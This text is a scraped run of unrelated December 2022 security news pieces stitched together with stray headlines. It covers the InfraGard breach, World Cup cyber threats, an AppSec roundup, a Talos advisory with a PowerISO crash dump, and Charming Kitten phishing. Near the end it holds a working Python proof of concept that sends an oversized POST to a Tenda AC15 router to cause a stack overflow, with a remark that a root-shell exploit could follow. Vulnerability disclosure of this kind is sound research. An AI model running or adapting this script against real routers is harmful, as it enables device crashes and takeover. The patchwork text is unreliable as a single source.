Plus: An FBI platform got hacked, an ex-Twitter employee is sentenced for espionage, malicious Windows 10 installers circulate in Ukraine, and more.

As Russia's invasion of Ukraine drags on, navigation system monitors reported this week that they've detected a rise in GPS disruptions in Russian cities, ever since Ukraine began mounting long-range drone attacks. Elsewhere, a lawsuit against Meta alleges that a lack of adequate hate-speech moderation on Facebook led to violence that exacerbated Ethiopia's civil war. 

New evidence suggests that attackers planted data to frame an Indian priest who died in police custody—and that the hackers may have collaborated with law enforcement as he was investigated. The Russia-based ransomware gang Cuba abused legitimate Microsoft certificates to sign some of their malware, a method of falsely legitimatizing hacking tools that cybercriminals have particularly been relying on lately. And with the one-year anniversary of the Log4Shell vulnerability, researchers and security professionals reflected on the current state of open source supply-chain security, and what must be done to improve patch adoption.

We also explored the confluence of factors and circumstances leading to radicalization and extremism in the United States. And Meta gave WIRED some insight into the difficulty of enabling users to recover their accounts when they get locked out—without allowing attackers to exploit those same mechanisms for account takeovers.

But wait, there’s more! Each week, we highlight the security news we didn’t cover in depth ourselves. Click on the headlines below to read the full stories.

Alexey Brayman, 35, was one of seven people named in a 16-count federal indictment this week in which they were accused of operating an international smuggling ring over the past five years, illegally exported restricted technology to Russia. Brayman was taken into custody on Tuesday and later released on a $150,000 bond, after being ordered to forfeit his passport and abide by a curfew. He is an Israeli citizen who was born in Ukraine. Brayman and his wife, Daria, live in Merrimack, New Hampshire, a small town where the two ran an online craft business out of their home. “They are the nicest family,” a delivery driver who regularly drops off packages at their home told _The Boston Globe_. “They’ll leave gift cards out around the holidays. And snacks.” The indictment alleges, though, that their house was a staging site for “millions of dollars in military and sensitive dual-use technologies from US manufacturers and vendors.” Two other suspects connected to the case have also been arrested in New Jersey and Estonia.

A hacker breached the FBI information-sharing database InfraGard this week, compromising data from more than 80,000 members who share details and updates through the platform related to critical infrastructure in the United States. Some of the data is sensitive and pertains to national and digital security threats. Last weekend, the hacker posted samples of data stolen from the platform on a relatively new cybercriminal forum called Breached. They priced the database at $50,000 for the full contents. The hacker claims to have gained access to InfraGard by posing as the CEO of a finance company. The FBI said it was “aware of a potential false account associated with the InfraGard Portal and that it is actively looking into the matter.”

Former Twitter employee Ahmad Abouammo was convicted in August of being paid to send user data to the Saudi Arabian government while working at the tech company. He was also found guilty of money laundering, wire fraud, and falsification of records. He has now been sentenced to 42 months in prison. Abouammo worked at Twitter from 2013 to 2015. “This case revealed that foreign governments will bribe insiders to obtain the user information that is collected and stored by our Silicon Valley social-media companies,” US attorney Stephanie Hinds said in a statement. “This sentence sends a message to insiders with access to user information to safeguard it, particularly from repressive regimes, or risk significant time in prison.” Earlier this year, whistleblower and former Twitter security chief Peiter Zatko alleged that Twitter has long had problems with foreign agents infiltrating the company. The situation has been of particular concern as new CEO Elon Musk massively overhauls the company and its workforce.

In an effort to compromise Ukrainian government networks,  hackers have been posting malicious Windows 10 installers on torrent sites used in Ukraine and Russia, according to researchers from the security firm Mandiant. The installers were set up with the Ukrainian language pack and were free to download. They deployed malware for reconnaissance, data gathering, and exfiltration. Mandiant said it could not definitively attribute the campaign to specific hackers, but that the targets overlap with those that have been attacked in past hacks by the Russian military intelligence agency GRU.

Years after it was proved vulnerable and insecure, the US National Institute of Standards and Technology said on Thursday that the SHA-1 cryptographic algorithm should be removed from all software platforms by December 31, 2030. Developers should turn instead to algorithms with more robust security, namely SHA-2 and SHA-3. The “security hash algorithm,” or SHA, was developed by the National Security Agency and debuted in 1993. SHA-1 is a slightly modified replacement used since 1995. By 2005 it was clear that SHA-1 was “cryptographically broken,” but it remained in widespread use for years. NIST said this week, though, that attacks on SHA-1 “have become increasingly severe.” Developers have eight years to migrate away for any remaining uses of the algorithm. "Modules that still use SHA-1 after 2030 will not be permitted for purchase by the federal government,” NIST computer scientist Chris Celi said in a statement.

An Alleged Russian Smuggling Ring Was Uncovered in New Hampshire

The 2022 FIFA Men's World Cup final in Qatar will be the most-watched sporting event in history — but will cybercriminals score a hat trick off its state-of-the-art digital footprint?

As Argentina and France prepare to face off in Doha for the final of the 2022 FIFA Men's World Cup, stadium staff and tournament organizers likely have more on their minds than whether Lionel Messi or Kylian Mbappe will claim the title of top goal-scorer. The event represents a vast cyberattack surface for both FIFA and the host nation of Qatar, security experts say — and ahead of the tournament's grand finale, cyber threats from all corners remain very clear and present.

According to FIFA, 2022 will end up being the most-watched tournament in history, followed by literally billions around the globe. On-the-ground numbers are impressive, too: Stadium Lusail, where the final will be played, is the biggest stadium in Qatar and has a capacity of the 88,966 spectators. Ticket sales for the World Cup have topped 3 million for an unprecedented 1.2 million visitors, which is equivalent to nearly half of Qatar's population.

That's a juicy target for not only financially motivated threat actors and hacktivists but also nation-state groups, who more often than not can get the ball in the back of the intelligence-gathering net when they want to.

**Smart Stadiums & the Digital Pitch**

The risks come from a few different places: social engineering efforts against fans and visitors being the most well known. What's less well known is the fact that Qatar has leaned in hard to the smart stadium concept, connecting its eight World Cup venues into one connected digital space.

A partnership between Johnson Controls' OpenBlue digital platform and Microsoft Azure, for instance, has enabled an artificial intelligence-based approach to physical security and operations, gathering data from edge devices and systems to identify when a security or safety issue has the potential to affect fans and players, or how crowd size and weather changes might affect energy efficiency and playing conditions.

Each stadium also has a 3D digital twin, an interactive digital model that provides live information on safety, comfort, and sustainability to a team of command center experts.

"With major sporting events becoming increasingly digitized, the attack surface for threat actors has also increased," a recent ZeroFox report on World Cup threats noted. "Qatar has constructed eight state-of-the-art 'smart stadiums' specifically for the World Cup, meaning sophisticated threat actors will almost certainly aim to compromise networks by exploiting vulnerabilities within interconnected stadium systems, including operational technology and Internet of Things (IoT) devices."

This raises the possibility of denial-of-service attacks or disruption on the order of the Olympic Destroyer threat, which took aim (largely unsuccessfully) at the Winter Games in Pyeongchang in 2018.

While it's not known what specific cyber defenses this first-of-its-kind footprint has in place, Qatar brought in a team of cybersecurity experts for a summit in March, and it has been working closely with Interpol's Project Stadia to enhance its security posture. So far, so good — but it's not over yet.

**Mobile Privacy Concerns**

Also, notably, there is a pair of mobile apps that everyone 18 and above entering Qatar for the World Cup is required to download, named Ehteraz and Hayya. Ehteraz is a COVID-19 tracking app, while Hayya is an app used for World Cup game tickets and accessing the Qatar metro system to move between stadiums.

At issue is the fact that Ehteraz has an extensive list of required permissions so that it can monitor locations and proximity to other app users; it can capture data from the device, automatically exfiltrate data from a user's phone, disable a lock screen, make calls from the phone, and access location services.

The Hayya app, meanwhile, is able to "access almost all personal information on a phone," according to ZeroFox, and can tap into location services and network connections between a phone and other networks.

Both apps potentially offer riches to cybercriminals. "When threat actors look to exploit an app, the end goal is to steal information that would be profitable — login credentials, personally identifiable information, email, credit cards, etc. — so that they can either sell it to actors who know how to further exploit or use the credentials and check to see if they can steal money or crypto from the victim accounts," says Adam Darrah, senior director of Dark Ops Collections at ZeroFox.

However, more shadowy risks also apply; the apps, with their broad set of access to personal data, are a perfect vector for espionage and creating fan chaos.

"When a nation-state or a motivated hacktivist group has you in their sights, they will find a way in," Darrah says. "All nations view an event such as the World Cup as a way to gather intelligence."

Regarding the COVID-19 contact tracing app for instance, the ZeroFox report noted, "Critics fear downloading the app could give the Qatari government access to privileged or sensitive content on a user’s phone. This is particularly notable if the user is breaking a Qatari law. It could also give Qatari authorities access to proprietary information contained on a company phone."

The firm recommended not installing the app on any phone with access to sensitive information, as a precaution.

**Facial Recognition at the World Cup**

Another wrinkle in the threat landscape for the World Cup is the vast facial-recognition footprint that Qatar has stood up in order to help respond to any threats of bodily harm to visitors and staff. Tensions famously run high at football (aka soccer) matches, but beyond run-of-the-mill hooliganism, some tourney-watchers are concerned that there could be a serious physical security incident.

To help thwart such a situation, the country has installed more than 15,000 cameras with facial recognition technology stationed throughout the eight stadiums and along roads and transportation infrastructure in Doha.

The benefits to physical security are myriad, of course. "Say a fan places a suspicious package close to a stadium entrance. When security personnel are alerted to this threat, staff can retroactively use facial recognition to trace the suspect's steps, determine where they are going next, and possibly pick them out in a crowd if needed," Terry Schulenberg, vice president of business development at CyberLink, tells Dark Reading. "The technology can even alert staff when a bad actor enters their area. Facial recognition will provide staff with the information they need."

However, critics have raised privacy concerns, a well-worn issue when it comes to facial recognition. After all, the population can't "opt in" to being scanned; the potential for surveillance by the Qatari government or advanced persistent threats (APTs) is there; and, it's unclear how the system handles the biometric data it collects.

"It would benefit them not to store faces in the cameras, workstations, or servers," Schulenberg says. "Rather, they could use software that identifies hundreds of vectors on a subject's face — such as the distance between the eyebrows — convert them into an encrypted file, send this file to a workstation or server, and compare its values with those of previously recorded subjects or those enrolled in a database. If it's being used, this more airtight facial recognition model will help security operators process camera feed data more quickly and securely."

If Qatar is not storing full images of attendees' faces, any unlikely leak of facial recognition data would be unreadable without access to the specific software Qatar is using, he stresses. 

**Thwarting Social Engineering Threats**

And finally, utterly predictably, phishers and scammers have been drawn to the event, using World Cup-themed lures, malicious mobile apps, and bogus ticketing websites to harvest data and steal funds from unsuspecting fans. In fact, Kaspersky said this week that its researchers have seen fake tickets being sold for as much as $4,000 a pop.

Group-IB's Digital Risk Protection team recently said it has detected more than 16,000 scam domains, and dozens of fake social media accounts, advertisements, and mobile applications created by scammers aiming to capitalize on the world's largest sporting event. The researchers also uncovered more than 90 potentially compromised accounts on official FIFA World Cup 2022 fan portals.

Patrick Harr, CEO at SlashNext, notes that FIFA and any World Cup host nation can take action to protect aficionados of the beautiful game from social engineering.

"FIFA could ensure its security program includes brand impersonation identification, remediation, and a takedown service," he says. "With this type of security control, FIFA could safeguard their millions of fans, so they don’t accidentally engage with malicious content while following the news on their favorite teams."

Eyal Benishti, founder and CEO at Ironscales, notes that FIFA also should be focusing on raising awareness, sounding a loud drumbeat to fans.

"They should be told to avoid clicking on links behind QR codes, stay away from SMS messages asking to validate or verify, and to go directly to the official FIFA domain only, to interact and purchase tickets," he says. "Send out clear communication to the future guests on the guidelines, what to expect and what to be on the lookout for."

He also pointed out that World Cup employees have also been targeted throughout the tournament, bringing up another layer of responsibility for organizers.

"For the FIFA organization and businesses of Qatar, focus on what you can control, like making sure your internal employees are educated and aware of the probability of fake emails and fake support requests that will spike," he says. "If they receive requests that seem out of place, always validate with the sender via phone or alternate communicate method. Be extra cautious and ensure the proper communication and education are taking place for your employees."

**Cybersecurity Lessons to Be Learned**

Qatar's World Cup hosting duties may be coming to a close, and hopefully without a major cyberattack marring the experience, but there are lessons to be learned when it comes to implementing good security for such a sprawling endeavor. 

Whether it's an attack on infrastructure, privacy concerns, or the phishing glut that has surrounded the tournament, the time is now to be thinking about risk mitigation for future events, like the upcoming 2023 FIFA Women's World Cup next summer.

Researchers say that it's especially crucial to conduct an assessment once all is said and done, ideally using threat intelligence and data from this winter's event — given that it's likely that many of the pioneering technologies that Qatar put in place for the tourney will be tapped for future tournaments. For instance, stadiums across the US, which is a co-host of the 2026 FIFA Men's World Cup, are already using facial recognition tools for staff and fan entry, ticket verification, and contactless payments.

"An event the size and scale of a World Cup represents rich pickings for the criminally inclined, with millions of visitors seen as millions of potential victims," Rob Fitzsimons, field application engineer at Telesoft Technologies, said in a recent column. "It is the responsibility of the host nation to ensure the safety and security of its guests — both physically and digitally."

He added, "Indeed, a continuous flow of real-time threat intelligence in advance of and throughout the tournament \[provides\] a greater understanding of the potential threats, and enables security professionals to better defend against them. Recognizing where vulnerabilities lie, and addressing these accordingly, will allow better protection of mobile networks, and help protect against targeted attacks … and, by monitoring and controlling the flow of information across these networks, it's possible to reduce the likelihood of more widescale attacks."

Cyber Threats Loom as 5B People Prepare to Watch World Cup Final

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 9 and Dec. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Round up for December 9 to December 16

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

John Leyden 16 December 2022 at 17:43 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

Our second web security roundup begins with news that a brace of network security flaws in products from Fortinet and Citrix have each come under active attack.

These attacks were respectively enabled by memory corruption vulnerabilities in the FortiOS SSL-VPN as well as a critical arbitrary code execution risk in Citrix ADC and Citrix Gateway (CVE-2022-27518). It’s unclear whether these assaults are linked, but their occurrence can still be said to underline the importance of patching SSL VPN devices, which have previously been vectors for pushing ransomware onto enterprise networks, among other attacks.

Uber this week suffered a data breach as a result of a cybersecurity incident at a third-party vendor, resulting in the exposure of employees’ personal information. The incident represents only the latest security breach to impact the ride-hailing app firm, which was previously faulted for the delayed disclosure of a 2016 breach that exposed the account records of customers and drivers. More recently, back in September, Uber’s internal IT systems were breached by a social engineering attack.

Over at Black Hat Europe, security researcher Nitesh Dhanjani discussed the impact of floor prices of non-fungible token (NFT) collections and how attacks focused on business dynamics have the potential to wreak havoc on marketplaces. Dhanjani also spoke about off-chain and on-chain sync algorithms, and how the disparities between the two blockchain-related environments can be abused.

I also attended the event for The Daily Swig, reporting on a keynote in which security researcher Daniel Cuthbert said the industry’s fixation on zero-day vulnerabilities was only a partial solution to making the internet fundamentally secure. We also covered some of the top hacking tools from the event.

Among other stories on The Daily Swig in recent days was an Akamai WAF bypass via Spring Boot, SQL injection payloads being smuggled past WAFs, and a crypto maintainer rejecting a bogus cryptocurrency ‘vulnerability’ submitted with the help of ChatGPT.

Here are some other web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web vulnerabilities**

*   Apache CXF / Critical / SSRF (server-side request forgery) vulnerability in parsing the href attribute of XOP / Disclosed with patch, December 13
*   Grails Spring Security Core plugin / CVE-2022-41923 / Critical / “Vulnerability allows an attacker access to one endpoint (i.e. the targeted endpoint) using the authorization requirements of a different endpoint” / Disclosed with patch, November 22
*   Microsoft .NET / CVE-2022-41089 / Critical / “Malicious actor could cause a user to run arbitrary code as a result of parsing maliciously crafted xps files” / Disclosed with a patch, December 13
*   Ping / CVE-2022-23093 / Memory-handling vulnerability involving networking protocol implementation by FreeBSD prompted its developers to test their own software, which unearthed a flaw in OpenBSD’s implementation of Ping that dates back to software changes introduced 24 years ago
*   Planet eStream / Critical / Vulnerabilities in video platform geared towards online learning enable attackers to take over user accounts with administrative privileges and execute arbitrary JavaScript code, among other attacks / Vendor has released software updates

**Research and attack techniques**

*   A researcher documented how it’s possible to exploit misconfigurations in cross-origin resource sharing (CORS) – a mechanism to control access to restricted website resources from external domains – to run various attacks. CORS misconfiguration issues have historically been downplayed but can seemingly be exploited to bypass CSRF protections or run cross-site tracking (XST) attacks.
*   Lightspin uncovered a serious flaw in an AWS-hosted service that allows software developers to find and share public container images. Attackers could potentially delete all images in the AWS Elastic Container Registry (ECR) Public Gallery or update image contents to inject malicious code, prompting AWS to resolve the problem within a day of its disclosure.
*   A series of flaws in three popular applications that allows an Android device to be used as a remote keyboard and mouse were exposed by Synopsys Cybersecurity Research Center (CyRC) The authentication, authorization, and insecure communication flaws potentially opened up attacks including keystroke sniffing.
*   Supposedly ‘air-gapped’ networks without direct access to the internet often require DNS services in order to resolve a company’s internal DNS records – a weakness potential hackers might be able to exploit, as a blog post by Pentera explains.
*   SALT Labs used a LEGO\-run site as a testbed to illustrate the general risk posed by API security issues. Researchers uncovered a variety of API-related security issues in LEGO’s Brick Lane, including a potential vector to internal production data and systems or manipulating users into surrendering control of their accounts.

LEGO reportedly fixed a number of API security issues found by SALT Labs

**Bug bounty / vulnerability disclosure**

*   HackerOne revealed that cloud-based vulnerabilities account for a growing proportion of vulnerabilities reported by bug bounty hunters, now totalling 65,000 in 2022, a year-on-year rise of 21%.
*   A security researcher who discovered a means to achieve unauthorized access to resumes stored on LinkedIn may have been left underwhelmed by the $5,000 bounty he received for his find, given the potential impact of the issue on users of the Microsoft-owned business-focused social network. An Insecure Direct Object Reference (IDOR) security vulnerability, inadvertently introduced in October 2022, could have allowed recruiters and perhaps more unsavoury parties to download resumes without permission.
*   Swedish video surveillance giant Axis Communications has launched a private bug bounty program with Bugcrowd.

**New open source infosec/hacking tools**

*   Node Security Shield – a defensive tool that takes an allow-listing approach to protecting zero-day protection for NodeJS applications. The tool was inspired by the infamous Log4Shell vulnerability, a zero-day vulnerability in Log4j, a popular Java logging framework.
*   Invoke-DNSteal – allows pen testers to perform file transfers using the DNS protocol as a covert communications channel.
*   Kubeshark – API Traffic Viewer for Kubernetes, providing “deep visibility and monitoring of all API traffic and payloads going in, out and across containers and pods inside a Kubernetes cluster”

**For devs**

*   Google has announced a free-of-charge scanner that allows open source developers to check their software projects for vulnerable dependencies. The tool – called OSV-Scanner – builds on Google’s work in developing an open source vulnerability database.
*   OWASP, best known for its ‘Top 10 Web Application Security Risks’ framework, is backing the creation of a similar scheme to index classes of security risks in the world of AppSec and DevSecOps. The Top 10 CI/CD Security Risks taxonomy aims to catalogue risks in the CI/CD pipeline. “Insufficient Flow Control Mechanisms” topped the nascent list.
*   The SHA-1 cryptographic algorithm, in use since 1995, has reached the end of its useful life, announced the National Institute of Standards and Technology (NIST), which says the federal government should phase out its use by 2030.
*   Research from Endor Labs found that the vast majority (95%) of all vulnerabilities are “found in transitive dependencies – open source code packages that are not selected by developers, but indirectly pulled into projects”.

**For fun**

ChatGPT – the artificial intelligence chat tool from OpenAI – is the hottest thing in infosec-focused social media circles just now. Rather than suggesting possible vulnerabilities in code we wondered what ChatGPT could conjure when asked to write lyrics for a song about SQL injection in the style of the late David Bowie.

The results were more than satisfactory:

In the realm of computers, where data flows like a stream  
There are those that seek to exploit and cause us all to scream  
They are the hackers, the codebreakers, the malicious ones  
And among their favorite trick is the art of SQL injection

Chorus:

SQL injection, SQL injection  
A dangerous game, a digital infection  
SQL injection, SQL injection  
Beware of the hackers and their devious invention

To paraphrase the great man himself, I still don’t know what I was waiting for... but it definitely wasn’t this.

RECOMMENDED Black Hat Europe 2022: A defendable internet is possible, but only with industry makeover

Deserialized web security roundup – Fortinet, Citrix bugs; another Uber breach; hacking NFTs at Black Hat 

A memory corruption vulnerability exists in the VHD File Format parsing CXSPARSE record functionality of PowerISO PowerISO 8.3. A specially-crafted file can lead to an out-of-bounds write. A victim needs to open a malicious file to trigger this vulnerability.

**SUMMARY**

A memory corruption vulnerability exists in the VHD File Format parsing CXSPARSE record functionality of PowerISO PowerISO 8.3. A specially-crafted file can lead to an out-of-bounds write. A victim needs to open a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

PowerISO PowerISO 8.3

**PRODUCT URLS**

PowerISO - https://www.poweriso.com/

**CVSSv3 SCORE**

7.8 - CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-787 - Out-of-bounds Write

**DETAILS**

PowerISO is a disk image file processing tool supporting operations on various file formats, and also allows to mount images as a virtual drive.

Virtual Hard Disk (VHD) Image format is a commonly image format used in Microsoft virtualization products. It is both used to store hard disk images and snapshots.  
For more details about this format see link.

Vulnerable code below:

        0000000000442869 | 41:8B0C38                | mov ecx,dword ptr ds:[r8+rdi]
        000000000044286D | 41:FFC1                  | inc r9d
        0000000000442870 | 8BC1                     | mov eax,ecx
        0000000000442872 | 8BD1                     | mov edx,ecx
        0000000000442874 | C1E9 08                  | shr ecx,8
        0000000000442877 | C1E2 10                  | shl edx,10
        000000000044287A | 41:23C5                  | and eax,r13d
        000000000044287D | 41:23CD                  | and ecx,r13d
        0000000000442880 | 0BD0                     | or edx,eax
        0000000000442882 | 41:0FB64438 03           | movzx eax,byte ptr ds:[r8+rdi+3]
        0000000000442888 | C1E2 08                  | shl edx,8
        000000000044288B | 0BD0                     | or edx,eax
        000000000044288D | 48:8B43 10               | mov rax,qword ptr ds:[rbx+10]
        0000000000442891 | 0BD1                     | or edx,ecx
        0000000000442893 | 41:891400                | mov dword ptr ds:[r8+rax],edx
        0000000000442897 | 49:83C0 04               | add r8,4
        000000000044289B | 44:3B4B 18               | cmp r9d,dword ptr ds:[rbx+18]       ; * Num of blocks from cxsparse record
        000000000044289F | 72 C8                    | jb poweriso.442869
    

Vulnerability exists because the “Num of blocks” value from the CXSPARSE record is not validated properly.  
An attacker can control the loop counter leading to arbitrary memory write.

**Crash Information**

    	PowerISO+0x42893:
    	00000000`00442893 41891400        mov     dword ptr [r8+rax],edx ds:00000000`02b2f000=????????
    
    
    	0:000> !analyze -v
    	*******************************************************************************
    	*                                                                             *
    	*                        Exception Analysis                                   *
    	*                                                                             *
    	*******************************************************************************
    
    
    	KEY_VALUES_STRING: 1
    
    		Key  : AV.Fault
    		Value: Write
    
    		Key  : Analysis.CPU.mSec
    		Value: 1281
    
    		Key  : Analysis.DebugAnalysisManager
    		Value: Create
    
    		Key  : Analysis.Elapsed.mSec
    		Value: 17362
    
    		Key  : Analysis.IO.Other.Mb
    		Value: 9
    
    		Key  : Analysis.IO.Read.Mb
    		Value: 1
    
    		Key  : Analysis.IO.Write.Mb
    		Value: 12
    
    		Key  : Analysis.Init.CPU.mSec
    		Value: 406
    
    		Key  : Analysis.Init.Elapsed.mSec
    		Value: 9616
    
    		Key  : Analysis.Memory.CommitPeak.Mb
    		Value: 106
    
    		Key  : Timeline.OS.Boot.DeltaSec
    		Value: 471002
    
    		Key  : Timeline.Process.Start.DeltaSec
    		Value: 12
    
    		Key  : WER.OS.Branch
    		Value: vb_release
    
    		Key  : WER.OS.Timestamp
    		Value: 2019-12-06T14:06:00Z
    
    		Key  : WER.OS.Version
    		Value: 10.0.19041.1
    
    		Key  : WER.Process.Version
    		Value: 8.3.0.0
    
    
    	NTGLOBALFLAG:  0
    
    	PROCESS_BAM_CURRENT_THROTTLED: 0
    
    	PROCESS_BAM_PREVIOUS_THROTTLED: 0
    
    	APPLICATION_VERIFIER_FLAGS:  0
    
    	EXCEPTION_RECORD:  (.exr -1)
    	ExceptionAddress: 0000000000442893 (PowerISO+0x0000000000042893)
    	   ExceptionCode: c0000005 (Access violation)
    	  ExceptionFlags: 00000000
    	NumberParameters: 2
    	   Parameter[0]: 0000000000000001
    	   Parameter[1]: 0000000002c5f000
    	Attempt to write to address 0000000002c5f000
    
    	FAULTING_THREAD:  00000ba0
    
    	PROCESS_NAME:  PowerISO.exe
    
    	WRITE_ADDRESS:  0000000002c5f000 
    
    	ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
    
    	EXCEPTION_CODE_STR:  c0000005
    
    	EXCEPTION_PARAMETER1:  0000000000000001
    
    	EXCEPTION_PARAMETER2:  0000000002c5f000
    
    	STACK_TEXT:  
    	00000000`0014de30 00000000`00442aad     : 00000000`00000200 00000000`00000000 00000000`000007b3 00000000`3000cbfb : PowerISO+0x42893
    	00000000`0014e2b0 00000000`00442d2c     : 00000000`05a603c0 00000000`00000000 78697463`656e6f63 00000000`00000001 : PowerISO+0x42aad
    	00000000`0014e520 00000000`004061ae     : 00000000`00000001 00000000`00000688 00000000`03380f70 00000000`03380f70 : PowerISO+0x42d2c
    	00000000`0014e560 00000000`005d6cf6     : 00000000`0014e7a8 00000000`0014e7a8 00000000`00000001 00000000`02ba853c : PowerISO+0x61ae
    	00000000`0014e710 00000000`004f2733     : 00000000`0014e8b0 00000000`00000000 00000000`00000000 00007ff9`4a6dc9bb : PowerISO+0x1d6cf6
    	00000000`0014e830 00000000`004f2fc5     : 00000000`1c12beb3 00000000`0014ebc8 00000000`66076fb2 00000000`d88dfeb5 : PowerISO+0xf2733
    	00000000`0014eb90 00000000`005561ef     : 00000000`00000004 00000000`0333ba1c 00000000`00000000 00000000`03348f60 : PowerISO+0xf2fc5
    	00000000`0014ebc0 00000000`004ee5ad     : 00000000`0014ed00 00007ff9`35ff414e 00000000`00000004 00008731`00000002 : PowerISO+0x1561ef
    	00000000`0014ebf0 00000000`006280ed     : 00000000`00000001 00007ff9`4a6deb96 00000000`00000363 00000000`00000001 : PowerISO+0xee5ad
    	00000000`0014f890 00000000`00624c83     : 00000000`02b50150 ffffffff`ffffffff 00000000`00000006 00000000`00000080 : PowerISO+0x2280ed
    	00000000`0014f9c0 00000000`004ebf6f     : 00000000`00000000 00000000`00d3103e 00000000`03348f60 00000000`00000001 : PowerISO+0x224c83
    	00000000`0014fa20 00000000`00626410     : ffffffff`fffffffe 00000000`00000113 00000000`00000000 00000000`00000113 : PowerISO+0xebf6f
    	00000000`0014fa50 00000000`006265be     : 00000000`008df500 00000000`00becb30 00000000`0333c920 00007ff9`02000002 : PowerISO+0x226410
    	00000000`0014fb10 00007ff9`4a6de858     : 00000000`008df4a0 00000000`00000113 00000000`00000001 00000000`00000000 : PowerISO+0x2265be
    	00000000`0014fb70 00007ff9`4a6de299     : 00000000`00d3103e 00000000`00626570 00000000`00d3103e 00000000`00000113 : USER32!UserCallWinProcCheckWow+0x2f8
    	00000000`0014fd00 00000000`00621c6d     : 00000000`00626570 00000000`008df4a0 00000000`00000002 00000000`008df4a0 : USER32!DispatchMessageWorker+0x249
    	00000000`0014fd80 00000000`00621aa9     : 00000000`008df4a0 00000000`00400000 00000000`00000001 00000000`00000000 : PowerISO+0x221c6d
    	00000000`0014fdc0 00000000`0062aa57     : 00000000`006486d8 00000000`00000000 00000000`00648718 00000000`00648720 : PowerISO+0x221aa9
    	00000000`0014fe20 00000000`005f607b     : 00000000`00000045 00000000`00000000 00000000`00000000 00000000`00400000 : PowerISO+0x22aa57
    	00000000`0014fe80 00007ff9`4a627034     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : PowerISO+0x1f607b
    	00000000`0014ff30 00007ff9`4a9426a1     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
    	00000000`0014ff60 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
    
    
    	STACK_COMMAND:  ~0s ; .cxr ; kb
    
    	SYMBOL_NAME:  PowerISO+42893
    
    	MODULE_NAME: PowerISO
    
    	IMAGE_NAME:  PowerISO.exe
    
    	FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_PowerISO.exe!Unknown
    
    	OS_VERSION:  10.0.19041.1
    
    	BUILDLAB_STR:  vb_release
    
    	OSPLATFORM_TYPE:  x64
    
    	OSNAME:  Windows 10
    
    	IMAGE_VERSION:  8.3.0.0
    
    	FAILURE_ID_HASH:  {1b12d601-7fad-79d8-d5a8-9f7caedc20c8}
    
    	Followup:     MachineOwner
    	---------
    

**TIMELINE**

2022-10-27 - Vendor Disclosure  
2022-11-28 - Vendor Patch Release  
2022-12-07 - Public Release

Discovered by Piotr Bania of Cisco Talos.

CVE-2022-41992: TALOS-2022-1644 || Cisco Talos Intelligence Group

Tenda AC15 V15.03.06.23 is vulnerable to Buffer Overflow via function formSetClientState.

/goform/SetClientState， The two variables ul\_speed and dl\_speed are user-controllable and will be spliced into the buff by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x300
p2 \= b'limitEn=1&deviceId=a&limitSpeedUp=a&limitSpeed=' + p1

p3 \= b"POST /goform/SetClientState" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-46109: IOT_Vul/Tenda/AC10/formSetClientState at main · z1r00/IOT_Vul

The not-so-charming APT's intelligence-gathering initiatives are likely being used by the Iranian state to target kidnapping victims.

State-sponsored advanced persistent threat (APT) Charming Kitten (aka TA453), which is purportedly linked to the Islamic Revolutionary Guard Corps (IRGC), has updated its phishing techniques, and is using malware and more confrontational lures, possibly in service to kidnapping operations.

Since 2020, Proofpoint researchers have observed variations in phishing activity by the APT (which also overlaps with the groups Phosphorous and APT42), with the group employing new methods and targeting different targets than in the past. In the latest campaigns, researchers have observed more aggressive activity, which could be used to support attempted "kinetic operations" from the IRGC, including murder for hire and kidnapping, researchers said.

"TA453, like its fellow advanced persistent threat actors engaged in espionage, is in a constant state of flux regarding its tools, tactics, techniques, and targeting," a Proofpoint report out this week concluded. "Adjusting its approaches, likely in response to ever-changing and expanding priorities, the outlier campaigns are likely to continue and reflect IRGC intelligence-collection requirements, including possible support for hostile, and even kinetic, operations."

**Hacking E-Mail Accounts**

In 2021, Proofpoint documented TA453 spoofing two scholars at the University of London to try and gain access to email inboxes belonging to journalists, think tank personnel, academics, and others. In August, Google researchers said the hacking team had started employing a data-theft tool targeting Gmail, Yahoo, and Microsoft Outlook accounts using previously acquired credentials. Intelligence gathered from email conversations could be used for location tracking and more. 

One campaign that researchers observed against a former member of the Israeli military was threatening and disturbing in that regard, Proofpoint's report noted.

